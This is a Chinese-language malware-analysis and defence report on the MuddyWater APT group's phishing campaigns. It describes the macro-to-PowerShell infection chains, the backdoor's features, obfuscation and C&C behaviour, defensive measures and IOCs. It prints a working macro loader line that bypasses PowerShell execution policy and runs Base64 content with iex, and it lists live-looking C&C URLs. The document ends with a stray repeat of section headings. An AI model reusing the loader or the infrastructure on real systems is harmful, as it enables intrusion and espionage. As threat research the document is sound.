MuddyWater APT组织攻击活动分析与防御指南<\/h1>

1. MuddyWater APT组织概述<\/h2>

MuddyWater<\/strong>（又称T-APT-14）是一个自2017年以来持续活跃的APT组织，主要针对中东国家进行网络攻击活动。该组织具有以下特征：<\/p>

主要目标国家<\/strong>：巴基斯坦、沙特阿拉伯、阿联酋、伊拉克、土耳其等中东国家<\/li>
目标行业<\/strong>：政府部门、电信公司、石油公司等关键基础设施<\/li>
攻击动机<\/strong>：以间谍活动为主<\/li>
疑似来源<\/strong>：根据攻击特征追踪，怀疑可能来自伊朗<\/li> <\/ul>
2. 近期攻击活动特点（2017-2018）<\/h2>
2.1 攻击目标扩展<\/h3>

新增塔吉克斯坦、巴基斯坦、土耳其等国<\/li>
特别关注土耳其政府机构（外交部、发展委员会、内政部等）<\/li> <\/ul>
2.2 攻击时间线<\/h3>

起始于2017年11月<\/li>
持续至2018年2月仍有新攻击样本出现<\/li> <\/ul>
3. 攻击技术分析<\/h2>
3.1 攻击流程<\/h3>
MuddyWater采用两种主要攻击流程：<\/p>
流程一：VBS+Powershell后门<\/h4>

发送精心构造的钓鱼文档<\/li>
诱骗目标启用文档宏<\/li>
恶意宏执行后：

写入VBS脚本和编码的Powershell文件到C:\ProgramData\ZIPSDK\<\/code><\/li>
加载VBS脚本<\/li>
VBS脚本解码并执行Powershell后门<\/li>
与C&C服务器通信<\/li> <\/ul> <\/li> <\/ol> 流程二：SCT+INF+INI组合<\/h4> 发送精心构造的钓鱼文档<\/li> 诱骗目标启用文档宏<\/li> 恶意宏执行后：写入SCT脚本、INF文件和INI文件（含编码的Powershell内容）<\/li> 使用系统程序cmstp.exe<\/code>加载INF执行<\/li> INF加载SCT中的JavaScript代码<\/li> 最终解码执行Powershell后门<\/li> 与C&C服务器通信<\/li> <\/ul> <\/li> <\/ol> 3.2 钓鱼文档特征<\/h3> 文档版本多为983040和1048576<\/li> 常带有输入框和按钮控件<\/li> 部分文档作者属性为"GIGABYTE"<\/li> 使用VBA工程保护（如CMG="848650DE506654665466546654"）<\/li> <\/ul> 3.3 恶意宏分析<\/h3> 宏代码会释放以下文件：<\/p> InstallConfNT.vbs<\/code>（修改自微软测试打印脚本）<\/li> ProjectConfManagerNT.ini<\/code>（含编码的Powershell后门）<\/li> <\/ul> 关键代码片段：<\/p> WScript.CreateObject("WScript.Shell").Run"mshtavbscript:Close(Execute(""CreateObject(""""WScript.Shell"""").Run""""powershell.exe-w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-contentC:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini)0""))",0 <\/code><\/pre> 3.4 Powershell后门分析<\/h3> 3.4.1 代码结构<\/h4> 后门代码分为三部分：<\/p> 配置信息<\/strong>：通过字符串replace进行混淆<\/li> 加解密函数<\/strong>：实现通信协议的加密解密<\/li> 后门主程序<\/strong>：通过split和bxor异或操作还原真实代码<\/li> <\/ol> 3.4.2 关键配置参数<\/h4> 参数<\/th> 值<\/th> <\/tr> <\/thead> ${URL}<\/td> 517个尝试连接的URL<\/td> <\/tr> ${TemppATh}<\/td> C:\ProgramData\ZIPSDK\<\/td> <\/tr> ${cOUNtRy_urL}<\/td> http:\/\/apinotes.com\/ipaddress\/ip.php?ip=<\/td> <\/tr> ${GeT_vAliDiP}<\/td> https:\/\/api.ipify.org\/<\/td> <\/tr> ${fileNAmEPAThv}<\/td> InstallConfNT.vbs<\/td> <\/tr> ${FilENAMePathP}<\/td> ProjectConfManagerNT.ini<\/td> <\/tr> ${pRivatE}<\/td> 959 713<\/td> <\/tr> ${pUbLIC}<\/td> 37 437<\/td> <\/tr> ${hKlm}<\/td> HKLM:\Software\<\/td> <\/tr> ${hKcU}<\/td> HKCU:\Software\<\/td> <\/tr> ${valUe}<\/td> kaspersky<\/td> <\/tr> <\/tbody> <\/table> 3.4.3 后门功能<\/h4> 系统信息收集<\/strong>：获取当前系统信息<\/li> 反调试机制<\/strong>：检测常见调试工具进程，如发现则调用shutdown关闭计算机检测的进程包括：ollydbg、ProcessHacker、tcpview、autoruns、procmon等<\/li> <\/ul> <\/li> 持久化机制<\/strong>：降低Word安全配置<\/li> 设置开机启动（通过注册表RUN项和计划任务两种方式）<\/li> <\/ul> <\/li> 远程控制功能<\/strong>：屏幕截取<\/li> 文件上传<\/li> 远程加载Powershell脚本执行<\/li> <\/ul> <\/li> <\/ol> 3.4.4 指令进化<\/h4> 原始指令<\/strong>：仅支持加载Powershell执行<\/li> 第一次升级<\/strong>： screenshot<\/code>：截取屏幕<\/li> upload<\/code>：上传截屏图像<\/li> 默认：加载Powershell执行<\/li> <\/ul> <\/li> 第二次升级<\/strong>：引入DCOM技术 screenshot<\/code>：截取屏幕<\/li> excel<\/code>：使用Excel DCOM加载Powershell脚本<\/li> outlook<\/code>：使用Outlook DCOM加载Powershell脚本<\/li> risk<\/code>：使用"9BA05972-F6A8-11CF-A442-00A0C90A8F39"对应的DCOM加载Powershell<\/li> upload<\/code>：上传截屏图像<\/li> 默认：加载服务器指定的Powershell命令<\/li> <\/ul> <\/li> <\/ol> 3.5 C&C通信机制<\/h3> 内置517个URL地址，依次尝试连接<\/li> 成功连接的地址作为实际C&C<\/li> URL特征：多以db_template.php<\/code>结尾<\/li> 部分URL存在格式错误（如双斜杠"\/\/"）<\/li> <\/ul> 4. 混淆与反检测技术<\/h2> 非PE文件利用<\/strong>：主要使用js、Powershell等脚本后门，减少文件落地<\/li> 内存执行<\/strong>：通过Powershell在内存中执行，降低检测率<\/li> 多层编码<\/strong>：Base64、字符串替换、异或操作等多重混淆<\/li> 假旗行动<\/strong>：在错误处理中包含"无法访问本地计算机寄存器"、"请等待龙..."等中文<\/li> 疑似通过翻译工具生成，用于混淆溯源<\/li> <\/ul> <\/li> <\/ol> 5. 攻击溯源发现<\/h2> 水坑攻击<\/strong>：发现美国联邦学生援助办公室(https:\/\/studentaid.ed.gov)网站曾被入侵并置入恶意文档<\/li> 博彩网站利用<\/strong>：部分样本中的加密字符串与搜索引擎中找到的博彩类网站相关<\/li> <\/ol> 6. 防御建议<\/h2> 6.1 用户防护<\/h3> 切勿随意打开来历不明的邮件附件<\/li> 禁用Office宏功能，或设置为高安全级别<\/li> 安装并更新终端安全软件<\/li> <\/ul> 6.2 企业防护<\/h3> 网络层防护<\/strong>：<\/p> 部署高级威胁检测系统（如腾讯御界）<\/li> 监控异常网络流量，特别是对可疑URL的访问<\/li> 阻断已知C&C地址的通信<\/li> <\/ul> <\/li> 终端防护<\/strong>：<\/p> 限制Powershell执行权限<\/li> 监控异常脚本执行行为（如大量Base64解码操作）<\/li> 检测常见的持久化技术（注册表、计划任务等）<\/li> <\/ul> <\/li> 日志与审计<\/strong>：<\/p> 启用并集中管理系统日志<\/li> 特别关注cmstp.exe<\/code>等系统工具的非正常使用<\/li> 监控Office文档的宏执行行为<\/li> <\/ul> <\/li> <\/ol> 7. IOC（入侵指标）<\/h2> 7.1 文档哈希与目标<\/h3> 文件哈希<\/th> 目标<\/th> 创建日期<\/th> 文档版本<\/th> 释放文件<\/th> <\/tr> <\/thead> d632c8444aab1b43a663401e80c0bac4<\/td> 土耳其武装军队<\/td> 2018\/2\/21<\/td> 1048576<\/td> Defender.sct, DefenderService.inf, WindowsDefender.ini<\/td> <\/tr> 24e1bd221ba3813ed7b6056136237587<\/td> 土耳其发展委员会<\/td> 2018\/2\/14<\/td> 1048576<\/td> InstallConfNT.vbs, ProjectConfManagerNT.ini<\/td> <\/tr> 5bd61a94e7698574eaf82ef277316463<\/td> 土耳其内政部<\/td> 2018\/1\/21<\/td> 983040<\/td> WindowsNT.ini, WindowsNT.vbs<\/td> <\/tr> 6c997726d502a68af2ac2e3563365852<\/td> 塔吉克斯坦外交部<\/td> 2017\/12\/31<\/td> 983040<\/td> system.ps1, system.vbs<\/td> <\/tr> bf310319d6ef95f69a45fc4f2d237ed4<\/td> 银行机构<\/td> 2017\/12\/19<\/td> 983040<\/td> Defender.sct, DefenderService.inf, WindowsDefender.ini<\/td> <\/tr> 5466c8a099d1d30096775b1f4357d3cf<\/td> 巴基斯坦国民议会<\/td> 2017\/12\/4<\/td> 983040<\/td> Defender.sct, DefenderService.inf, WindowsDefender.ini<\/td> <\/tr> cf3d8ee38a1c04d552d8fb8b80454c68<\/td> 电信Telenor巴基斯坦分公司<\/td> 2017\/11\/8<\/td> 983040<\/td> system.ps1, system.vbs<\/td> <\/tr> 1de684f66a87cdf8485f95693d188596<\/td> 冒充NSA组织<\/td> 2017\/11\/6<\/td> 983040<\/td> system.ps1, system.vbs<\/td> <\/tr> <\/tbody> <\/table> 7.2 部分C&C地址<\/h3> http:\/\/2atohumculuk.com\/upload\/files\/besin-maddesi-noksanliklari\/db_template.php http:\/\/akkalegida.com\/hemphpmail\/db_template.php http:\/\/ciftlikonuasm.gov.tr\/ckeditor\/plugins\/clipboard\/dialogs\/db_template.php http:\/\/luleburgazlazerepilasyon.com\/hemphpmail\/db_template.php http:\/\/refikengin.com\/hemphpmail\/db_template.php http:\/\/safakgazetesi.com.tr\/hemphpmail\/db_template.php http:\/\/sarilartarim.com\/hemphpmail\/db_template.php http:\/\/selvitarim.com.tr\/hemphpmail\/db_template.php http:\/\/seyidesen.com.tr\/hemphpmail\/db_template.php http:\/\/silivrisonmezemlak.com\/hemphpmail\/db_template.php http:\/\/yunusbeyasm.gov.tr\/hemphpmail\/db_template.php http:\/\/yigitersuurunleri.com\/hemphpmail\/db_template.php http:\/\/www.yeniinan.com\/hemphpmail\/db_template.php http:\/\/yavuztrapez.com\/hemphpmail\/db_template.php http:\/\/arsailani.com\/hemphpmail\/db_template.php http:\/\/bursabitkisel.com\/hemphpmail\/db_template.php http:\/\/bursatemamutfak.com\/hemphpmail\/db_template.php http:\/\/butikiletisim.com\/hemphpmail\/db_template.php http:\/\/dogadanderman.com\/hemphpmail\/db_template.php http:\/\/enginatalay.com\/hemphpmail\/db_template.php http:\/\/23digital-prod4.com\/mailtest\/db_template.php https:\/\/adrianskar.com\/.well-known\/acme-challenge\/db_template.php http:\/\/advanceddermatologyaustralia.com\/wp-includes\/db_template.php http:\/\/www.aesthetictrainingsolutions.com\/downloader\/db_template.php https:\/\/affordable-35mm-slide-scanning.com\/_WestHost\/db_template.php <\/code><\/pre> 8. 总结<\/h2> MuddyWater APT组织持续进化其攻击技术，特别注重：<\/p> 使用非PE文件后门（Powershell、JS等）<\/li> 开发成熟的混淆和反查杀技术<\/li> 扩大攻击目标和攻击方式<\/li> 采用DCOM等高级技术提升攻击能力<\/li> <\/ul> 组织和个人应提高安全意识，部署多层次防御措施，特别是针对脚本攻击的防护，以有效应对此类高级威胁。<\/p>

MuddyWater APT组织攻击活动分析与防御指南<\/h1>

2. 近期攻击活动特点（2017-2018）<\/h2>

3. 攻击技术分析<\/h2>

3.1 攻击流程<\/h3> MuddyWater采用两种主要攻击流程：<\/p>

3.4 Powershell后门分析<\/h3>

6. 防御建议<\/h2>

7. IOC（入侵指标）<\/h2>

3.1 攻击流程<\/h3>
MuddyWater采用两种主要攻击流程：<\/p>